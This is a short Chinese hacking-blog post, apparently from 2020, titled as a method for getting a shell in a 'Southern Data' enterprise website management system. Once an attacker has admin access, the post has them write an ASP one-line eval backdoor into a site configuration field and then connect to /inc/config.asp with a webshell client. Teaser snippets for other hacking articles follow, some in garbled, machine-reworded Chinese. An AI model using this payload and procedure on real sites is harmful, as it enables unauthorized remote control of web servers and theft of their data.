南方数据企业网站管理系统12.0拿SHELL ***

hacker5年前 (2020-05-31)黑客文章740

南方数据企业网站管理系统12.0插配置文件拿SHELL

在我们拿到南方数据企业管理系统后台账号密码后，可以使用下面的 *** 来拿shell

进入后台后点击系统管理网站配置

随便找个地方修改成

“%><%eval request(“qxz”)%><%Const nidaye=”xzlbb.com

然后用一句话客户端连接http://目标网站/inc/config.asp就OK了！

标签: 黑客技术

返回列表

因为我已经根据SQL引入获得了后台管理客户和登陆密码了，我也直接进入后台管理了。能够清晰的见到网站后台管理有“数据备份”作用。数据备份 getshell 基本原理：关键便是将一句...

Wireshark是一款十分时兴的网络抓包分析系统,作用十分强劲。能够提取各种各样互联网封包,显示信息互联网封包的详细资料。wireshark是十分时兴的互联网封包分析系统,作用十分强劲。应用wir...

什么叫Cain和Abel黑客工具？ Cain和Abel是用以密码恢复的最火爆的专用工具之一。它能够根据应用例如暴力行为进攻，登陆密码分析攻击和最常见的词典进攻这类的方式来修复各种各样登陆密码。这...

什么叫Snort？ Snort是由Martin Roesch建立的开源系统互联网入侵防御系统系统软件（NIDS）和互联网侵入防护系统（NIPS）。自2014年至今，Snort已由思科交换机全部。Sn...

什么叫OpenVAS？ OpenVas是一个完全免费的漏洞检测程序流程，该专用工具在2006年的专用工具合理合法后才从最后一个漏洞检测程序流程（Nessus）的完全免费版本号中删掉。OpenVAS的...

原创作者：泪舞 Qq:8109217 ( 转载请写上作者名 ) 动易CMS、我相信大家都不陌生吧?互联网很多企业站点都是用的动易...

找黑客平台